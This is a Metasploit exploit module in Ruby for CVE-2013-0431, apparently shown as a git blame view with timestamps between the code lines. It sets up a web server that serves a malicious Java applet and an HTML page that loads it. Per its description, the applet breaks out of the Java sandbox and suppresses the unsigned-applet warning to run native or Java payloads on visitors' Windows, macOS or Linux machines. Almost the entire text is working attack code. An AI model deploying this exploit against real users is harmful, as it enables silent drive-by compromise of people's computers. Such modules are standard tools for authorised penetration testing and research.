2013-02-20 16:39:53 +01:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-02-20 16:39:53 +01:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-02-20 16:39:53 +01:00
|
|
|
Rank = ExcellentRanking
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 16:39:53 +01:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
|
include Msf::Exploit::EXE
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-11-12 12:37:29 -06:00
|
|
|
#include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
|
#autopwn_info({ :javascript => false })
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 16:39:53 +01:00
|
|
|
def initialize( info = {} )
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 16:39:53 +01:00
|
|
|
super( update_info( info,
|
|
|
|
|
'Name' => 'Java Applet JMX Remote Code Execution',
|
|
|
|
|
'Description' => %q{
|
2013-02-20 18:14:53 +01:00
|
|
|
This module abuses the JMX classes from a Java Applet to run arbitrary Java code
|
|
|
|
|
outside of the sandbox as exploited in the wild in February of 2013. Additionally,
|
|
|
|
|
this module bypasses default security settings introduced in Java 7 Update 10 to run
|
|
|
|
|
unsigned applet without displaying any warning to the user.
|
2013-02-20 16:39:53 +01:00
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Unknown', # Vulnerability discovery and exploit in the wild
|
|
|
|
|
'Adam Gowdiak', # Vulnerability discovery
|
|
|
|
|
'SecurityObscurity', # Exploit analysis and deobfuscation
|
|
|
|
|
'juan vazquez' # Metasploit module
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'CVE', '2013-0431' ],
|
2016-07-15 12:00:31 -05:00
|
|
|
[ 'OSVDB', '89613' ],
|
2013-02-20 16:39:53 +01:00
|
|
|
[ 'BID', '57726' ],
|
|
|
|
|
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
|
|
|
|
|
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
|
|
|
|
|
[ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
|
2013-02-20 18:14:53 +01:00
|
|
|
[ 'URL', 'http://pastebin.com/QWU1rqjf' ],
|
|
|
|
|
[ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
|
2013-02-20 16:39:53 +01:00
|
|
|
],
|
2013-09-24 12:33:31 -05:00
|
|
|
'Platform' => %w{ java linux osx win },
|
2013-02-20 16:39:53 +01:00
|
|
|
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'Generic (Java Payload)',
|
|
|
|
|
{
|
|
|
|
|
'Platform' => ['java'],
|
|
|
|
|
'Arch' => ARCH_JAVA,
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
[ 'Windows x86 (Native Payload)',
|
|
|
|
|
{
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
[ 'Mac OS X x86 (Native Payload)',
|
|
|
|
|
{
|
|
|
|
|
'Platform' => 'osx',
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
[ 'Linux x86 (Native Payload)',
|
|
|
|
|
{
|
|
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
],
|
|
|
|
|
'DefaultTarget' => 0,
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2013-01-19'
|
2013-02-20 16:39:53 +01:00
|
|
|
))
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 16:39:53 +01:00
|
|
|
def on_request_uri(cli, request)
|
|
|
|
|
print_status("handling request for #{request.uri}")
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 16:39:53 +01:00
|
|
|
case request.uri
|
|
|
|
|
when /\.jar$/i
|
2013-02-20 18:14:53 +01:00
|
|
|
print_status("Sending JAR")
|
|
|
|
|
send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } )
|
2013-02-20 17:50:47 +01:00
|
|
|
when /\/$/
|
2013-02-20 18:14:53 +01:00
|
|
|
print_status("Sending HTML")
|
2013-02-20 16:39:53 +01:00
|
|
|
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
|
|
|
|
|
else
|
|
|
|
|
send_redirect(cli, get_resource() + '/', '')
|
|
|
|
|
end
|
2013-02-20 18:14:53 +01:00
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 18:14:53 +01:00
|
|
|
def generate_jar
|
|
|
|
|
paths = [
|
|
|
|
|
[ "Exploit.ser" ],
|
|
|
|
|
[ "Exploit.class" ],
|
|
|
|
|
[ "B.class" ]
|
|
|
|
|
]
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 18:14:53 +01:00
|
|
|
p = regenerate_payload(cli)
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 18:14:53 +01:00
|
|
|
jar = p.encoded_jar
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 18:14:53 +01:00
|
|
|
paths.each do |path|
|
|
|
|
|
1.upto(path.length - 1) do |idx|
|
|
|
|
|
full = path[0,idx].join("/") + "/"
|
|
|
|
|
if !(jar.entries.map{|e|e.name}.include?(full))
|
|
|
|
|
jar.add_file(full, '')
|
|
|
|
|
end
|
|
|
|
|
end
|
2013-09-26 20:34:48 +01:00
|
|
|
fd = File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0431", path ), "rb")
|
2013-02-20 18:14:53 +01:00
|
|
|
data = fd.read(fd.stat.size)
|
|
|
|
|
jar.add_file(path.join("/"), data)
|
|
|
|
|
fd.close
|
|
|
|
|
end
|
|
|
|
|
return jar.pack
|
2013-02-20 16:39:53 +01:00
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2013-02-20 16:39:53 +01:00
|
|
|
def generate_html
|
2013-02-21 01:13:25 +01:00
|
|
|
html = <<-EOF
|
|
|
|
|
<html>
|
|
|
|
|
<script language="Javascript">
|
|
|
|
|
|
|
|
|
|
var _app = navigator.appName;
|
|
|
|
|
|
|
|
|
|
if (_app == 'Microsoft Internet Explorer') {
|
|
|
|
|
document.write('<applet archive="#{rand_text_alpha(4+rand(4))}.jar" object="Exploit.ser"></applet>');
|
|
|
|
|
} else {
|
|
|
|
|
document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>');
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
</script>
|
|
|
|
|
</html>
|
|
|
|
|
EOF
|
2013-02-20 16:39:53 +01:00
|
|
|
return html
|
|
|
|
|
end
|
|
|
|
|
end
|
